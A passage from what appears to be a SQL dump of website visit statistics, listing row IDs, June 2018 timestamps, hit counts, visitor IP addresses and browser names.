,'91.196.178.172','chrome'),(260480,1529418363,1,1,0,0,'188.230.43.254','other'),(260481,1529418554,1,1,0,0,'178.154.171.88','other'),(260482,1529418872,1,0,1,0,'66.249.65.156',''),(260483,1529418893,1,1,0,0,'66.249.65.155','chrome'),(260484,1529419120,1,1,0,0,'8.29.198.26','other'),(260485,1529419352,1,1,0,0,'176.108.102.72','chrome'),(260486,1529419363,2,2,0,0,'141.8.142.74','other'),(260487,1529419893,1,1,0,0,'107.167.105.92','other'),(260488,1529420199,1,1,0,0,'216.244.66.241','other'),(260489,1529420376,1,1,0,0,'46.133.83.152','chrome'),(260490,1529420532,1,1,0,0,'87.250.224.46','other'),(260491,1529420591,2,2,0,0,'91.196.178.164','chrome'),(260492,1529420721,1,1,0,0,'188.230.43.254','other'),(260493,1529421006,3,3,0,0,'141.8.142.74','other'),(260494,1529421093,1,0,1,0,'66.249.65.123',''),(260495,1529421176,1,1,0,0,'162.210.196.98','other'),(260496,1529421312,1,1,0,0,'62.205.134.182','other'),(260497,1529421494,1,1,0,0,'141.8.142.167','other'),(260498,1529421809,1,1,0,0,'176.108.102.72','chrome'),(260499,1529421915,2,2,0,0,'91.196.178.172','chrome'),(260500,1529422046,2,0,2,0,'66.249.65.157',''),(260501,1529422204,1,1,0,0,'185.234.217.247','firefox'),(260502,1529422214,1,1,0,0,'94.230.208.148','opera'),(260503,1529422233,1,1,0,0,'146.185.177.103','firefox'),(260504,1529422239,1,1,0,0,'185.248.160.231','firefox'),(260505,1529422240,1,1,0,0,'185.100.87.206','opera'),(260506,1529422249,1,1,0,0,'195.254.134.194','other'),(260507,1529422477,1,1,0,0,'141.8.142.74','other'),(260508,1529422639,1,1,0,0,'91.209.11.236','other'),(260509,1529423052,1,1,0,0,'87.250.224.46','other'),(260510,1529423121,1,1,0,0,'188.230.43.254','other'),(260511,1529423762,2,2,0,0,'178.54.6.91','chrome'),(260512,1529424043,1,1,0,0,'149.202.72.198','firefox'),(260513,1529424538,1,1,0,0,'8.29.198.26','other'),(260514,1529424540,1,1,0,0,'178.140.85.133','msie'),(260515,1529424542,1,1,0,0,'188.32.50.142','msie'),(260516,1529424917,1,1,0,0,'62.205.134.182','other'),(260517,1529425232,1,1,0,0,'13.57.220.0','chrome'),(260518,1529425523,1,1,0,0,'188.230.43.254','other'),(260519,1529425550,1,1,0,0,'216.244.66.241','other'),(260520,1529425785,1,0,1,0,'66.249.65.157',''),(260521,1529425843,1,0,1,0,'66.249.65.156',''),(260522,1529425880,1,1,0,0,'69.171.225.82','other'),(260523,1529427085,1,1,0,0,'37.73.86.211','chrome'),(260524,1529427312,1,1,0,0,'157.55.39.194','other'),(260525,1529427494,2,2,0,0,'91.196.178.35','chrome'),(260526,1529427875,1,1,0,0,'178.154.171.60','other'),(260527,1529427952,1,1,0,0,'188.230.43.254','other'),(260528,1529428369,1,1,0,0,'141.8.142.74','other'),(260529,1529428519,1,1,0,0,'62.205.134.182','other'),(260530,1529428645,2,2,0,0,'91.196.178.172','chrome'),(260531,1529428829,1,0,1,0,'66.249.65.156',''),(260532,1529428950,1,1,0,0,'207.46.13.40','other'),(260533,1529429238,1,0,1,0,'66.249.65.121',''),(260534,1529429272,1,0,1,0,'66.249.65.157',''),(260535,1529429425,1,1,0,0,'216.244.66.241','other'),(260536,1529429829,2,2,0,0,'78.46.117.185','firefox'),(260537,1529429833,1,1,0,0,'159.69.5.29','firefox'),(260538,1529429964,1,1,0,0,'8.29.198.27','other'),(260539,1529430326,1,1,0,0,'188.230.43.254','other'),(260540,1529430329,1,1,0,0,'46.133.181.95','chrome'),(260541,1529430724,2,2,0,0,'141.8.142.74','other'),(260542,1529430829,1,1,0,0,'157.55.39.121','other'),(260543,1529431419,1,1,0,0,'216.244.66.241','other'),(260544,1529431610,2,2,0,0,'178.95.45.125','chrome'),(260545,1529431914,1,1,0,0,'87.250.224.46','other'),(260546,1529431951,3,3,0,0,'141.8.142.74','other'),(260547,1529432098,1,1,0,0,'91.232.158.75','other'),(260548,1529432125,1,1,0,0,'62.205.134.182','other'),(260549,1529432662,22,22,0,0,'142.44.159.96','other'),(260550,1529432791,1,1,0,0,'216.244.66.241','other'),(260551,1529433081,1,1,0,0,'91.196.178.102','other'),(260552,1529433334,1,1,0,0,'46.211.2.189','chrome'),(260553,1529433553,2,2,0,0,'37.54.18.159','chrome'),(260554,1529434055,2,2,0,0,'5.45.207.82','other'),(260555,1529434797,1,0,1,0,'66.249.65.155',''),(260556,1529435015,1,1,0,0,'216.244.66.241','other'),(260557,1529435277,1,1,0,0,'87.250.224.46','other'),(260558,1529435315,1,1,0,0,'207.46.13.35','other'),(260559,1529435394,1,1,0,0,'8.29.198.27','other'),(260560,1529435713,1,1,0,0,'62.205.134.182','other'),(260561,1529435867,1,1,0,0,'94.178.110.5','chrome'),(260562,1529436397,1,1,0,0,'216.244.66.241','other'),(260563,1529437420,1,1,0,0,'66.220.156.150','other'),(260564,1529437721,2,0,2,0,'66.249.64.29',''),(260565,1529437979,1,1,0,0,'78.27.139.66','other'),(260566,1529439002,1,1,0,0,'141.8.142.74','other'),(260567,1529439318,1,1,0,0,'62.205.134.182','other'),(260568,1529440804,1,1,0,0,'8.29.198.25','other'),(260569,1529441204,23,23,0,0,'142.44.159.96','other'),(260570,1529441360,1,1,0,0,'87.250.224.46','other'),(260571,1529441487,1,0,1,0,'66.249.70.25',''),(260572,1529441574,1,1,0,0,'66.249.64.28','chrome'),(260573,1529442604,1,1,0,0,'95.163.255.103','other'),(260574,1529442915,1,1,0,0,'62.205.134.182','other'),(260575,1529443687,1,1,0,0,'37.73.80.157','other'),(260576,1529444041,1,0,1,0,'66.249.64.28',''),(260577,1529444425,2,2,0,0,'141.8.142.74','other'),(260578,1529444603,1,1,0,0,'178.154.171.88','other'),(260579,1529444872,1,1,0,0,'216.244.66.241','other'),(260580,1529445705,1,0,1,0,'66.249.64.29',''),(260581,1529446232,1,1,0,0,'8.29.198.27','other'),(260582,1529446523,1,1,0,0,'62.205.134.182','other'),(260583,1529447223,1,1,0,0,'141.8.142.74','other'),(260584,1529447337,1,1,0,0,'216.244.66.241','other'),(260585,1529448125,1,0,1,0,'66.249.64.29',''),(260586,1529448957,1,1,0,0,'37.9.113.182','other'),(260587,1529449578,2,2,0,0,'141.8.142.74','other'),(260588,1529450117,1,1,0,0,'62.205.134.182','other'),(260589,1529450691,1,1,0,0,'87.250.224.46','other'),(260590,1529450916,1,1,0,0,'141.8.142.74','other'),(260591,1529451340,1,1,0,0,'18.207.2.146','other'),(260592,1529451653,1,1,0,0,'8.29.198.25','other'),(260593,1529451697,1,1,0,0,'180.76.15.11','other'),(260594,1529451715,1,1,0,0,'216.244.66.241','other'),(260595,1529452251,1,1,0,0,'18.207.2.146','other'),(260596,1529452592,1,1,0,0,'213.180.203.8','other'),(260597,1529453155,1,1,0,0,'18.207.2.146','other'),(260598,1529453713,1,1,0,0,'62.205.134.182','other'),(260599,1529454060,1,1,0,0,'18.207.2.146','other'),(260600,1529454199,2,2,0,0,'216.244.66.241','other'),(260601,1529454743,1,1,0,0,'141.8.142.74','other'),(260602,1529454962,1,1,0,0,'18.207.2.146','other'),(260603,1529454992,1,1,0,0,'91.209.11.236','other'),(260604,1529455284,3,3,0,0,'204.12.197.234','other'),(260605,1529455865,1,1,0,0,'18.207.2.146','other'),(260606,1529456093,1,1,0,0,'178.154.171.88','other'),(260607,1529456474,1,1,0,0,'157.55.39.241','other'),(260608,1529456771,1,1,0,0,'18.207.2.146','other'),(260609,1529457064,1,1,0,0,'8.29.198.26','other'),(260610,1529457319,1,1,0,0,'62.205.134.182','other'),(260611,1529457677,2,2,0,0,'18.207.2.146','other'),(260612,1529458421,1,1,0,0,'87.250.224.46','other'),(260613,1529458604,1,1,0,0,'18.207.2.146','other'),(260614,1529459510,1,1,0,0,'18.207.2.146','other'),(260615,1529459583,1,1,0,0,'178.154.171.88','other'),(260616,1529459731,11,11,0,0,'23.237.4.26','other'),(260617,1529460415,1,1,0,0,'18.207.2.146','other'),(260618,1529460924,1,1,0,0,'62.205.134.182','other'),(260619,1529461321,1,1,0,0,'18.207.2.146','other'),(260620,1529461589,1,1,0,0,'141.8.142.74','other'),(260621,1529462224,1,1,0,0,'18.207.2.146','other'),(260622,1529462503,1,1,0,0,'8.29.198.26','other'),(260623,1529462510,1,0,1,0,'66.249.70.29',''),(260624,1529463141,1,1,0,0,'18.207.2.146','other'),(260625,1529463494,3,3,0,0,'213.239.216.194','other'),(260626,1529463551,1,1,0,0,'66.249.64.28','chrome'),(260627,1529463901,1,1,0,0,'216.244.66.241','other'),(260628,1529464048,1,1,0,0,'18.207.2.146','other'),(260629,1529464513,1,1,0,0,'62.205.134.182','other'),(260630,1529464950,1,1,0,0,'18.207.2.146','other'),(260631,1529465147,1,1,0,0,'37.9.113.182','other'),(260632,1529465419,1,1,0,0,'87.250.224.46','other'),(260633,1529465853,1,1,0,0,'18.207.2.146','other'),(260634,1529465895,2,2,0,0,'37.54.18.159','chrome'),(260635,1529466289,2,2,0,0,'91.196.178.168','chrome'),(260636,1529466373,2,2,0,0,'95.213.141.126','opera'),(260637,1529466771,1,1,0,0,'18.207.2.146','other'),(260638,1529467094,2,2,0,0,'178.154.171.88','other'),(260639,1529467171,1,1,0,0,'180.76.15.147','other'),(260640,1529467688,1,1,0,0,'18.207.2.146','other'),(260641,1529467757,1,1,0,0,'141.8.142.74','other'),(260642,1529467760,1,1,0,0,'87.250.224.46','other'),(260643,1529467903,1,1,0,0,'8.29.198.27','other'),(260644,1529468133,1,1,0,0,'62.205.134.182','other'),(260645,1529468420,1,1,0,0,'213.180.203.8','other'),(260646,1529468592,1,1,0,0,'18.207.2.146','other'),(260647,1529469495,1,1,0,0,'18.207.2.146','other'),(260648,1529469531,1,1,0,0,'216.244.66.241','other'),(260649,1529470002,1,1,0,0,'95.216.15.189','other'),(260650,1529470405,1,1,0,0,'18.207.2.146','other'),(260651,1529470447,1,1,0,0,'37.9.113.182','other'),(260652,1529470940,1,1,0,0,'213.202.254.136','opera'),(260653,1529471306,1,1,0,0,'18.207.2.146','other'),(260654,1529471528,1,1,0,0,'141.8.142.74','other'),(260655,1529471712,1,1,0,0,'62.205.134.182','other'),(260656,1529471814,1,1,0,0,'37.9.113.182','other'),(260657,1529472094,1,1,0,0,'216.244.66.241','other'),(260658,1529472210,1,1,0,0,'18.207.2.146','other'),(260659,1529472233,1,1,0,0,'91.209.11.236','other'),(260660,1529472276,1,0,1,0,'66.249.64.28',''),(260661,1529472446,1,1,0,0,'91.196.177.46','chrome'),(260662,1529472697,1,1,0,0,'91.196.178.73','chrome'),(260663,1529472717,3,3,0,0,'91.196.178.87','chrome'),(260664,1529473001,1,1,0,0,'37.55.245.180','chrome'),(260665,1529473112,1,1,0,0,'18.207.2.146','other'),(260666,1529473354,1,1,0,0,'8.29.198.26','other'),(260667,1529473692,1,1,0,0,'216.244.66.241','other'),(260668,1529473736,4,4,0,0,'91.196.178.73','chrome'),(260669,1529474035,1,1,0,0,'18.207.2.146','other'),(260670,1529474400,2,2,0,0,'91.196.178.87','chrome'),(260671,1529474729,2,2,0,0,'91.196.178.73','chrome'),(260672,1529474740,4,4,0,0,'91.196.178.74','chrome'),(260673,1529474938,1,1,0,0,'18.207.2.146','other'),(260674,1529474977,1,1,0,0,'18.237.36.18','chrome'),(260675,1529475227,2,2,0,0,'54.165.59.7','other'),(260676,1529475313,1,1,0,0,'62.205.134.182','other'),(260677,1529475465,2,2,0,0,'216.244.66.241','other'),(260678,1529475649,8,8,0,0,'80.241.214.124','other'),(260679,1529475735,1,0,1,0,'66.249.64.28',''),(260680,1529475839,1,1,0,0,'18.207.2.146','other'),(260681,1529476349,1,1,0,0,'185.30.202.105','firefox'),(260682,1529476805,1,1,0,0,'216.244.66.241','other'),(260683,1529476824,1,1,0,0,'18.207.2.146','other'),(260684,1529477722,2,2,0,0,'46.211.99.26','chrome'),(260685,1529477727,1,1,0,0,'18.207.2.146','other'),(260686,1529477941,2,2,0,0,'92.112.125.72','chrome'),(260687,1529478061,2,2,0,0,'216.244.66.241','other'),(260688,1529478290,1,0,1,0,'66.249.64.28',''),(260689,1529478404,2,2,0,0,'91.196.178.169','chrome'),(260690,1529478630,1,1,0,0,'18.207.2.146','other'),(260691,1529478757,1,1,0,0,'8.29.198.27','other'),(260692,1529478810,1,1,0,0,'176.108.102.72','chrome'),(260693,1529478902,2,2,0,0,'92.112.125.72','chrome'),(260694,1529478914,1,1,0,0,'62.205.134.182','other'),(260695,1529479337,4,4,0,0,'18.237.37.58','chrome'),(260696,1529479340,1,1,0,0,'18.237.37.58','firefox'),(260698,1529479385,1,1,0,0,'141.8.142.74','other'),(260699,1529479532,1,1,0,0,'18.207.2.146','other'),(260700,1529479709,1,1,0,0,'95.163.255.94','other'),(260701,1529479879,1,1,0,0,'178.154.171.88','other'),(260702,1529479913,1,1,0,0,'82.207.122.32','chrome'),(260703,1529480062,22,22,0,0,'142.44.159.96','other'),(260704,1529480419,1,1,0,0,'195.10.210.70','chrome'),(260705,1529480455,1,1,0,0,'18.207.2.146','other'),(260706,1529481301,1,1,0,0,'5.166.232.79','msie'),(260707,1529481357,1,1,0,0,'18.207.2.146','other'),(260708,1529481542,1,1,0,0,'46.211.3.223','chrome'),(260709,1529481586,3,3,0,0,'195.10.210.70','chrome'),(260710,1529481766,1,1,0,0,'192.81.222.95','chrome'),(260711,1529481967,1,1,0,0,'178.94.173.156','chrome'),(260712,1529482263,1,1,0,0,'18.207.2.146','other'),(260713,1529482265,1,1,0,0,'216.244.66.241','other'),(260714,1529482289,1,1,0,0,'37.73.137.135','chrome'),(260715,1529482468,1,1,0,0,'188.230.43.254','other'),(260716,1529482513,1,1,0,0,'62.205.134.182','other'),(260717,1529482675,1,1,0,0,'141.8.142.74','other'),(260718,1529482817,1,1,0,0,'176.108.102.72','chrome'),(260719,1529482908,1,0,1,0,'66.249.64.29',''),(260720,1529483168,1,1,0,0,'18.207.2.146','other'),(260721,1529483455,1,1,0,0,'37.73.137.135','chrome'),(260722,1529483580,1,1,0,0,'142.4.200.37','other'),(260723,1529483609,1,1,0,0,'91.196.178.97','chrome'),(260724,1529484089,1,1,0,0,'18.207.2.146','other'),(260725,1529484186,1,1,0,0,'8.29.198.26','other'),(260726,1529484503,1,1,0,0,'188.230.43.254','other'),(260727,1529484994,1,1,0,0,'18.207.2.146','other'),(260728,1529485768,2,2,0,0,'91.196.178.169','chrome'),(260729,1529485898,1,1,0,0,'18.207.2.146','other'),(260730,1529486055,1,1,0,0,'176.108.102.72','chrome'),(260731,1529486111,1,1,0,0,'62.205.134.182','other'),(260732,1529486244,1,1,0,0,'91.196.178.87','firefox'),(260733,1529486800,1,1,0,0,'18.207.2.146','other'),(260734,1529486847,2,2,0,0,'91.196.178.73','chrome'),(260735,1529487455,1,1,0,0,'157.55.39.241','other'),(260736,1529487585,1,1,0,0,'66.249.64.30','chrome'),(260737,1529487719,1,1,0,0,'18.207.2.146','other'),(260738,1529487764,1,0,1,0,'66.249.70.27',''),(260739,1529488058,1,1,0,0,'141.8.142.74','other'),(260740,1529488220,1,1,0,0,'62.205.134.182','other'),(260741,1529488243,1,1,0,0,'178.154.171.88','other'),(260742,1529488363,1,1,0,0,'87.250.224.46','other'),(260743,1529488370,1,1,0,0,'91.196.178.181','chrome'),(260744,1529488441,1,1,0,0,'212.1.94.126','chrome'),(260745,1529488626,1,1,0,0,'18.207.2.146','other'),(260746,1529489044,1,1,0,0,'141.8.142.74','other'),(260747,1529489530,1,1,0,0,'18.207.2.146','other'),(260748,1529489596,1,1,0,0,'8.29.198.27','other'),(260749,1529489730,1,1,0,0,'62.205.134.182','other'),(260750,1529490157,1,1,0,0,'216.244.66.241','other'),(260751,1529490333,1,0,1,0,'66.249.70.25',''),(260752,1529490440,1,1,0,0,'18.207.2.146','other'),(260753,1529490987,1,1,0,0,'95.163.255.99','other'),(260754,1529491351,1,1,0,0,'18.207.2.146','other'),(260755,1529491653,1,1,0,0,'95.134.203.0','chrome'),(260756,1529492252,1,1,0,0,'18.207.2.146','other'),(260757,1529492347,1,1,0,0,'193.105.62.10','chrome'),(260758,1529493181,1,1,0,0,'18.207.2.146','other'),(260759,1529493313,1,1,0,0,'62.205.134.182','other'),(260760,1529493878,1,0,1,0,'66.249.64.28',''),(260761,1529493913,2,2,0,0,'37.53.254.224','chrome'),(260762,1529493946,2,2,0,0,'91.196.178.169','chrome'),(260763,1529493952,2,0,2,0,'66.249.64.30',''),(260764,1529493957,1,0,1,0,'66.249.64.29',''),(260765,1529494109,1,1,0,0,'18.207.2.146','other'),(260766,1529494995,7,7,0,0,'46.4.68.71','other'),(260767,1529495012,1,1,0,0,'18.207.2.146','other'),(260768,1529495026,1,1,0,0,'8.29.198.27','other'),(260769,1529495276,1,1,0,0,'178.154.200.41','other'),(260770,1529495342,3,3,0,0,'130.180.217.55','chrome'),(260771,1529495643,1,1,0,0,'91.196.179.138','chrome'),(260772,1529495814,1,1,0,0,'107.167.109.191','chrome'),(260773,1529495895,1,1,0,0,'141.8.142.74','other'),(260774,1529495913,1,1,0,0,'18.207.2.146','other'),(260775,1529496224,1,1,0,0,'157.55.39.121','other'),(260776,1529496419,1,0,1,0,'66.249.64.28',''),(260777,1529496647,1,1,0,0,'178.154.171.88','other'),(260778,1529496699,1,1,0,0,'95.220.217.17','msie'),(260779,1529496814,1,1,0,0,'18.207.2.146','other'),(260780,1529496853,1,1,0,0,'176.113.209.232','chrome'),(260781,1529496913,1,1,0,0,'62.205.134.182','other'),(260782,1529497204,1,1,0,0,'157.55.39.241','other'),(260783,1529497518,1,1,0,0,'207.46.13.212','other'),(260784,1529497560,2,2,0,0,'91.196.178.73','chrome'),(260785,1529497715,1,1,0,0,'18.207.2.146','other'),(260786,1529498721,1,1,0,0,'54.165.59.7','other'),(260787,1529498930,2,2,0,0,'157.55.39.241','other'),(260788,1529499103,1,1,0,0,'95.163.255.94','other'),(260789,1529499563,1,0,1,0,'66.249.70.29',''),(260790,1529499593,1,0,1,0,'66.249.70.27',''),(260791,1529499735,1,0,1,0,'66.249.64.30',''),(260792,1529499885,2,2,0,0,'91.196.177.134','chrome'),(260793,1529500170,1,1,0,0,'216.244.66.241','other'),(260794,1529500439,1,1,0,0,'8.29.198.27','other'),(260795,1529500512,1,1,0,0,'62.205.134.182','other'),(260796,1529500721,2,2,0,0,'91.121.86.136','other'),(260797,1529501321,1,1,0,0,'46.200.83.106','chrome'),(260798,1529501347,1,1,0,0,'66.249.70.29','chrome'),(260799,1529501749,1,1,0,0,'91.196.178.78','firefox'),(260800,1529502428,1,1,0,0,'91.196.178.87','chrome'),(260801,1529502998,1,0,1,0,'66.249.64.29',''),(260802,1529503026,1,0,1,0,'66.249.64.30',''),(260803,1529503321,2,2,0,0,'92.112.105.243','chrome'),(260804,1529503623,1,1,0,0,'91.124.182.170','firefox'),(260805,1529503627,1,1,0,0,'91.196.178.181','chrome'),(260806,1529503676,1,1,0,0,'37.53.235.160','firefox'),(260807,1529504149,1,1,0,0,'62.205.134.182','other'),(260808,1529504365,2,2,0,0,'91.196.178.163','chrome'),(260809,1529504647,1,1,0,0,'77.247.181.165','other'),(260810,1529505162,1,1,0,0,'91.196.178.47','chrome'),(260811,1529505856,1,1,0,0,'8.29.198.26','other'),(260812,1529506318,1,1,0,0,'87.250.224.46','other'),(260813,1529506619,1,0,1,0,'66.249.64.28',''),(260814,1529506645,1,1,0,0,'180.76.15.18','other'),(260815,1529508227,1,1,0,0,'95.163.255.97','other'),(260816,1529508669,1,1,0,0,'188.230.43.254','other'),(260817,1529509079,1,0,1,0,'66.249.64.28',''),(260818,1529509174,1,0,1,0,'66.249.64.29',''),(260819,1529509555,1,1,0,0,'180.76.15.8','other'),(260820,1529509594,3,3,0,0,'194.187.170.124','other'),(260821,1529510422,2,2,0,0,'5.9.156.30','other'),(260822,1529510546,1,1,0,0,'91.196.178.132','chrome'),(260823,1529510597,4,4,0,0,'194.187.170.124','other'),(260824,1529511044,1,1,0,0,'188.230.43.254','other'),(260825,1529511156,1,1,0,0,'178.154.171.88','other'),(260826,1529511173,1,1,0,0,'216.244.66.241','other'),(260827,1529511279,1,1,0,0,'8.29.198.27','other'),(260828,1529512250,2,2,0,0,'216.244.66.241','other'),(260829,1529512353,4,4,0,0,'194.187.170.124','other'),(260830,1529512992,2,2,0,0,'46.185.2.145','chrome'),(260831,1529513257,1,1,0,0,'180.76.15.8','other'),(260832,1529513442,1,1,0,0,'188.230.43.254','other'),(260833,1529513559,3,3,0,0,'194.187.170.124','other'),(260834,1529514696,1,1,0,0,'178.154.171.88','other'),(260835,1529515210,1,1,0,0,'216.244.66.241','other'),(260836,1529515307,3,3,0,0,'194.187.170.124','other'),(260837,1529515952,3,2,1,0,'66.249.64.29',''),(260838,1529516041,1,0,1,0,'66.249.64.30',''),(260839,1529516123,1,1,0,0,'87.250.224.46','other'),(260840,1529516581,3,3,0,0,'194.187.170.124','other'),(260841,1529516698,1,1,0,0,'8.29.198.26','other'),(260842,1529516750,2,2,0,0,'91.196.178.168','chrome'),(260843,1529517613,3,3,0,0,'194.187.170.124','other'),(260844,1529517990,1,1,0,0,'216.244.66.241','other'),(260845,1529518272,1,0,1,0,'66.249.70.25',''),(260846,1529518608,2,2,0,0,'194.187.170.124','other'),(260847,1529519115,1,1,0,0,'176.116.138.95','chrome'),(260848,1529519790,1,0,1,0,'66.249.70.25',''),(260849,1529519813,6,6,0,0,'194.187.170.124','other'),(260850,1529520004,2,2,0,0,'146.185.157.225','chrome'),(260851,1529520858,1,1,0,0,'95.163.255.113','other'),(260852,1529520988,5,5,0,0,'194.187.170.124','other'),(260853,1529521175,1,1,0,0,'46.185.2.145','chrome'),(260854,1529521216,1,1,0,0,'141.8.142.74','other'),(260855,1529521265,2,2,0,0,'37.54.18.159','chrome'),(260856,1529522145,1,1,0,0,'8.29.198.26','other'),(260857,1529522371,1,1,0,0,'194.187.170.124','other'),(260858,1529522636,1,1,0,0,'37.9.113.182','other'),(260859,1529523447,1,1,0,0,'141.8.142.74','other'),(260860,1529523828,1,1,0,0,'193.19.119.35','firefox'),(260861,1529524216,4,4,0,0,'194.187.170.124','other'),(260862,1529524358,1,1,0,0,'141.8.142.74','other'),(260863,1529524849,1,1,0,0,'216.244.66.241','other'),(260864,1529525121,4,4,0,0,'194.187.170.124','other'),(260865,1529525707,1,1,0,0,'69.30.211.2','other'),(260866,1529525723,1,1,0,0,'87.250.224.46','other'),(260867,1529526185,2,2,0,0,'194.187.170.124','other'),(260868,1529527228,2,2,0,0,'93.73.173.105','chrome'),(260869,1529527534,1,1,0,0,'8.29.198.25','other'),(260870,1529528795,1,1,0,0,'207.46.13.212','other'),(260871,1529528809,1,1,0,0,'66.249.64.29','chrome'),(260872,1529528995,1,1,0,0,'157.55.39.121','other'),(260873,1529529036,1,0,1,0,'66.249.70.29',''),(260874,1529529353,1,1,0,0,'95.132.17.120','chrome'),(260875,1529529443,1,1,0,0,'80.252.154.233','chrome'),(260876,1529529756,1,1,0,0,'216.244.66.241','other'),(260877,1529530834,1,1,0,0,'180.76.15.160','other'),(260878,1529530978,1,1,0,0,'141.8.142.74','other'),(260879,1529531986,1,1,0,0,'157.55.39.241','other'),(260880,1529532181,2,2,0,0,'216.244.66.241','other'),(260881,1529532996,1,1,0,0,'8.29.198.25','other'),(260882,1529533074,1,1,0,0,'207.46.13.212','other'),(260883,1529533348,1,1,0,0,'95.163.255.102','other'),(260884,1529533439,1,0,1,0,'66.249.64.29',''),(260885,1529533658,1,0,1,0,'66.249.64.28',''),(260886,1529534491,1,1,0,0,'157.55.39.241','other'),(260887,1529535032,2,2,0,0,'216.244.66.241','other'),(260888,1529535280,1,1,0,0,'141.8.142.74','other'),(260889,1529536550,1,1,0,0,'37.9.113.182','other'),(260890,1529537566,1,1,0,0,'178.154.171.88','other'),(260891,1529538368,1,1,0,0,'8.29.198.26','other'),(260892,1529538505,1,1,0,0,'178.154.171.88','other'),(260893,1529538590,1,1,0,0,'66.249.64.28','chrome'),(260894,1529539523,1,1,0,0,'66.249.64.28','chrome'),(260895,1529539652,1,1,0,0,'167.114.1.124','other'),(260896,1529539907,2,2,0,0,'141.8.142.74','other'),(260897,1529540851,1,1,0,0,'216.244.66.241','other'),(260898,1529541130,2,2,0,0,'141.8.142.74','other'),(260899,1529542013,1,1,0,0,'216.244.66.241','other'),(260900,1529542704,1,1,0,0,'66.249.64.30','chrome'),(260901,1529542963,1,1,0,0,'178.154.171.88','other'),(260902,1529543172,1,1,0,0,'141.8.142.74','other'),(260903,1529543841,1,1,0,0,'8.29.198.26','other'),(260904,1529544157,1,1,0,0,'141.8.142.74','other'),(260905,1529544779,1,1,0,0,'216.244.66.241','other'),(260906,1529545131,1,1,0,0,'141.8.142.74','other'),(260907,1529546792,1,1,0,0,'95.163.255.98','other'),(260908,1529547554,1,1,0,0,'37.9.113.182','other'),(260909,1529547557,1,1,0,0,'178.154.171.88','other'),(260910,1529547723,1,1,0,0,'216.244.66.241','other'),(260911,1529548599,1,1,0,0,'213.180.203.7','other'),(260912,1529548627,1,1,0,0,'91.196.178.104','chrome'),(260913,1529549201,1,1,0,0,'8.29.198.26','other'),(260914,1529550263,1,1,0,0,'216.244.66.241','other'),(260915,1529550646,5,5,0,0,'173.212.240.226','other'),(260916,1529551118,1,1,0,0,'157.55.39.241','other'),(260917,1529552951,1,1,0,0,'216.244.66.241','other'),(260918,1529553461,2,2,0,0,'141.8.142.74','other'),(260919,1529554610,1,1,0,0,'216.244.66.241','other'),(260920,1529554680,1,1,0,0,'8.29.198.25','other'),(260921,1529555008,1,1,0,0,'157.55.39.241','other'),(260922,1529556309,1,1,0,0,'66.249.64.29','chrome'),(260923,1529557243,1,1,0,0,'216.244.66.241','other'),(260924,1529557455,2,2,0,0,'66.249.64.29','chrome'),(260925,1529557912,1,1,0,0,'87.250.224.46','other'),(260926,1529557938,1,1,0,0,'46.211.129.248','chrome'),(260927,1529558303,3,3,0,0,'216.244.66.241','other'),(260928,1529558648,3,3,0,0,'146.185.135.165','chrome'),(260929,1529558817,3,3,0,0,'91.196.178.73','chrome'),(260930,1529560043,1,1,0,0,'8.29.198.25','other'),(260931,1529560087,1,1,0,0,'216.244.66.241','other'),(260932,1529561200,1,1,0,0,'216.244.66.241','other'),(260933,1529561528,1,1,0,0,'195.10.210.70','chrome'),(260934,1529562678,1,1,0,0,'95.163.255.98','other'),(260935,1529563352,1,1,0,0,'178.154.171.88','other'),(260936,1529563401,2,2,0,0,'51.38.128.13','other'),(260937,1529563774,1,1,0,0,'212.1.84.170','firefox'),(260938,1529564059,1,1,0,0,'91.196.178.167','firefox'),(260939,1529564509,1,1,0,0,'91.196.178.130','firefox'),(260940,1529565071,1,1,0,0,'95.163.255.96','other'),(260941,1529565252,1,1,0,0,'178.154.171.88','other'),(260942,1529565553,1,1,0,0,'8.29.198.27','other'),(260943,1529566243,1,1,0,0,'91.196.178.180','chrome'),(260944,1529566932,1,1,0,0,'37.54.22.84','chrome'),(260945,1529566969,1,1,0,0,'37.55.73.16','chrome'),(260946,1529567083,1,1,0,0,'82.207.91.234','other'),(260947,1529567494,2,2,0,0,'91.196.178.73','chrome'),(260948,1529567932,2,2,0,0,'87.250.224.46','other'),(260949,1529567988,2,2,0,0,'91.196.178.169','chrome'),(260950,1529568080,1,1,0,0,'91.196.178.86','firefox'),(260951,1529568083,1,1,0,0,'178.154.171.88','other'),(260952,1529568574,1,1,0,0,'180.76.15.32','other'),(260953,1529568883,2,2,0,0,'91.196.178.87','chrome'),(260954,1529569110,4,4,0,0,'216.244.66.241','other'),(260955,1529569854,1,1,0,0,'37.73.100.126','chrome'),(260956,1529570507,1,1,0,0,'141.8.142.74','other'),(260957,1529570610,1,1,0,0,'47.96.233.90','other'),(260958,1529570621,2,2,0,0,'91.196.178.73','chrome'),(260959,1529570878,1,1,0,0,'8.29.198.26','other'),(260960,1529571132,1,1,0,0,'92.112.125.243','chrome'),(260961,1529572164,1,1,0,0,'216.244.66.241','other'),(260962,1529572290,7,5,2,0,'66.249.64.28',''),(260963,1529572328,2,1,1,0,'66.249.64.30',''),(260964,1529572332,3,3,0,0,'66.249.64.29','chrome'),(260965,1529572458,1,1,0,0,'66.249.64.30','chrome'),(260966,1529572492,1,1,0,0,'66.249.64.28','chrome'),(260967,1529572501,1,1,0,0,'188.244.32.76','msie'),(260968,1529572944,1,1,0,0,'77.111.247.57','chrome'),(260969,1529572990,1,1,0,0,'92.112.125.243','chrome'),(260970,1529573621,2,0,2,0,'66.249.64.29',''),(260971,1529573781,1,1,0,0,'94.23.196.106','other'),(260972,1529574577,1,1,0,0,'130.180.211.205','chrome'),(260973,1529574725,2,2,0,0,'91.196.178.169','chrome'),(260974,1529574903,1,1,0,0,'95.163.255.107','other'),(260975,1529574912,1,1,0,0,'95.163.255.106','other'),(260976,1529574923,1,1,0,0,'95.163.255.108','other'),(260977,1529574935,1,1,0,0,'95.163.255.104','other'),(260978,1529574944,1,1,0,0,'95.163.255.116','other'),(260979,1529574954,1,1,0,0,'95.163.255.117','other'),(260980,1529574974,2,2,0,0,'95.163.255.112','other'),(260981,1529574983,1,1,0,0,'95.163.255.114','other'),(260982,1529574994,1,1,0,0,'95.163.255.103','other'),(260983,1529575591,1,0,1,0,'66.249.70.29',''),(260984,1529576404,1,1,0,0,'8.29.198.27','other'),(260985,1529576653,1,0,1,0,'66.249.70.25',''),(260986,1529577298,2,0,2,0,'66.249.64.30',''),(260987,1529577487,1,1,0,0,'77.111.247.47','chrome'),(260988,1529578003,1,1,0,0,'91.196.178.75','firefox'),(260989,1529578269,1,1,0,0,'141.8.142.74','other'),(260990,1529578330,1,1,